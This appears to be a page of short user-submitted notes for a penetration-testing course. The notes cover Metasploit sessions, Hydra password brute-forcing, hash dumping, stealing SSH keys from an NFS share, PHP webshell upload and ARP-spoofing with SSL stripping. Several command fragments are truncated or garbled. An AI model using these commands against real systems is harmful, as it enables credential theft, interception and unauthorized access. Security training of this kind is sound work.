Advanced Penetration Testing Notes

Syntax Error

As by default IPv6 syntax will be used, try /router_add// /target_add//   use / address //

By: PRATEEK | Related Lesson: Traffic Capture (part 5) ettercap | Modified: May 17, 2017

Session metasploit

sessions -l lists the sessions opened previously (background sessions); usually a session is put in the background by pressing Ctrl+Z. To get back into the session we can do sessions -i <session ID>

By: praveenAgent47 | Related Lesson: Metasploit (part 3) Operation | Modified: May 17, 2017


connect vs connect_ex

By: suhailmt | Related Lesson: Programming (part 4) Python for Port Scanning | Modified: May 17, 2017

Offline Password Attacks

nano windowshashes.txt

By: rspeight10 | Related Lesson: Passwords (part 3) Offline Password Attacks | Modified: May 16, 2017

Online Password Hacking

hydra -l <username> -p <password> -L (list of names) -P (list of passwords) hydra -l Georgia -P passwords.txt ftp

By: rspeight10 | Related Lesson: Passwords (part 2) Online Password Cracking | Modified: May 16, 2017

Password Attacks

meterpreter > hashdump bkhive system syskey.txt samdump2 sam syskey.txt

By: rspeight10 | Related Lesson: Passwords (part 1) Password Attacks | Modified: May 16, 2017

Attaching to an IP

Network file system showmount -e <ip-address> mkdir /tmp/georgia mount -t nfs -o nolock /tmp/Georgia cd /tmp/georgia ls -a (shows hidden directories) cat authorized_keys cp id_rsa /root/.ssh/id_rsa apt-get install

By: rspeight10 | Related Lesson: Exploitation (part 6) Attaching to an IP Address | Modified: May 16, 2017

SQL Commands (you have access to MySQL DB) net user james Georgia /add atftpd --daemon --bind-address /tmp netstat -antp get meterpreter.php c:\

By: rspeight10 | Related Lesson: Exploitation (part 2) SQL Commands | Modified: May 16, 2017

Direct Exploitation

cadaver wampp xampp nano test.txt make sure you can upload files 192.168.1.76/webdev/test.txt /usr/share/webshells cd php simple-backdoor.php /usr/share/webshells/php> cadaver http://192.168.

By: rspeight10 | Related Lesson: Exploitation (part 1) Direct Exploitation | Modified: May 16, 2017

SSL Stripping

SSL Man in the Middle (arpspoof the IP address) enable arpspoofing arpspoof -i eth0 -t enable iptables rules iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080 sslstrip -l 8080

By: rspeight10 | Related Lesson: Traffic Capture (part 6) SSL Stripping | Modified: May 16, 2017
